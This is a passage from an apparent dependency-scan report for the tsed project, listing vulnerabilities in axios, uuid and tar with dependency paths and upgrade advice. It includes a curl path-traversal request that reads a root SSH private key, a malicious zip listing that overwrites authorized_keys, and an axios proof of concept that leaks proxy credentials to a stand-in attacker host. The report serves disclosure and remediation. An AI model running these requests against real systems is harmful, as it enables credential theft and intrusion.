When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

medium severity
new

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: axios@1.15.2

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed axios@1.15.2
    Remediation: Upgrade to axios@1.16.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution via the setProxy function. An attacker can inject arbitrary credentials into the Proxy-Authorization header of proxied HTTP requests by polluting the prototype chain of nested proxy configuration objects.

Notes:

  • This vulnerability is the result of an incomplete fix for CVE-2026-42264, which protected the top-level config object from prototype pollution but allowed for nested objects created by utils.merge() (e.g., config.proxy) to be constructed as plain {} with Object.prototype in their chain.
  • This is only exploitable if the application explicitly configures a proxy via the proxy option and a separate prototype pollution vulnerability exists in the dependency tree.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 1.16.0 or higher.

References

medium severity

Improper Validation of Specified Index, Position, or Offset in Input

  • Vulnerable module: uuid
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 uuid@10.0.0
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 uuid@10.0.0
    Remediation: Upgrade to lerna@9.0.0.

Overview

uuid is a RFC4122 (v1, v4, and v5) compliant UUID library.

Affected versions of this package are vulnerable to Improper Validation of Specified Index, Position, or Offset in Input due to accepting external output buffers but not rejecting out-of-range writes (small buf or large offset). This inconsistency allows silent partial writes into caller-provided buffers.

PoC

cd /home/StrawHat/uuid
npm ci
npm run build

node --input-type=module -e "
import {v4,v5,v6} from './dist-node/index.js';
const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';
for (const [name,fn] of [
  ['v4',()=>v4({},new Uint8Array(8),4)],
  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],
  ['v6',()=>v6({},new Uint8Array(8),4)],
]) {
  try { fn(); console.log(name,'NO_THROW'); }
  catch(e){ console.log(name,'THREW',e.name); }
}"

Remediation

Upgrade uuid to version 11.1.1, 14.0.0 or higher.

References

medium severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.4.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.4.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmaccess@8.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 libnpmpublish@9.0.9 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/sign@2.3.2 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 pacote@18.0.6 sigstore@2.3.1 @sigstore/tuf@2.3.4 tuf-js@2.2.1 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via processing of hardlinks. An attacker can read or overwrite arbitrary files on the file system by crafting a malicious TAR archive that bypasses path traversal protections during extraction.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.7 or higher.

References

medium severity
new

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: axios
  • Introduced through: axios@1.15.2

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed axios@1.15.2
    Remediation: Upgrade to axios@1.16.0.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data in the setProxy function. An attacker can obtain proxy credentials by inducing a redirect from an HTTP request sent through an authenticated proxy to an HTTPS endpoint where no proxy applies, causing the proxy credentials to be forwarded to the final origin.

Note:

This is only exploitable if the application is running in Node.js with the HTTP adapter, an initial HTTP request uses an authenticated proxy, redirects are enabled, the redirect target does not use a proxy, and the redirect shape is not stripped by confidential-header handling.

Workaround

This vulnerability can be mitigated by setting maxRedirects: 0 and handling redirects manually, ensuring Proxy-Authorization is not copied to requests that are not sent through the proxy. Avoid using reusable authenticated HTTP proxy credentials for requests to untrusted origins. If exposure is suspected, rotate the proxy credential.

PoC

process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;

// The local HTTP proxy receives this request and returns:
// HTTP/1.1 302 Found
// Location: https://attacker.test/final
await axios.get('http://attacker.test/start');

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

medium severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: lerna@8.1.8

Detailed paths

  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.4.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.4.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 npm-registry-fetch@17.1.0 make-fetch-happen@13.0.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 pacote@18.0.6 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @npmcli/arborist@7.5.4 @npmcli/metavuln-calculator@7.1.1 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 @lerna/create@8.1.8 @npmcli/arborist@7.5.4 cacache@18.0.4 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
  • Introduced through: @tsed/root@TypedProject/tsed lerna@8.1.8 pacote@18.0.6 @npmcli/run-script@8.1.0 node-gyp@10.3.1 tar@6.2.1
    Remediation: Upgrade to lerna@9.0.0.
